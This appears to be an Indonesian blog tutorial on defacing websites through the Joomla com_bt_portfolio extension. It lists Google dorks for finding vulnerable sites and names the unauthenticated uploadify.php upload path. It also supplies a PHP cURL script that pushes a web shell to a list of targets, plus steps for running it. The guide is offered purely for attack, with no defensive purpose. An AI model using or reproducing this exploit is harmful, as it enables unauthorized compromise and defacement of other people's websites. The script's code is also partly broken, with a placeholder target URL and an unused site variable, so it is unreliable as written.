Tutorial Deface Com BT Portfolio

Tutorial Deface Com bt portfolio

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface

1. Search di google dgn dork:
Dork:
inurl:/index.php?option=com_bt_portfolio
inurl:/bt_portfolio
(Kembangin lg biar dpt banyak web yg vuln and verawan kak)

2. Pilih salah satu web target, dan masukan exploit:
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php

3. Vuln = Blank
4).Buat File Baru Berekstensi .php Contoh ferdiganteng.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php
Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn ferdiganteng.php tadi

<?php

$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;

$uploadfile="shell.php";
$ch =curl_init("trget/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?>

4. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
5. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

6. jika sukses , akan muncul nama shell sobat di CMD

Video :

PhantomGhost

By : Sumber

Artikel Terkait

Tutorial Deface Com BT Portfolio

4/ 5

Oleh ok

ok 07 October Komentar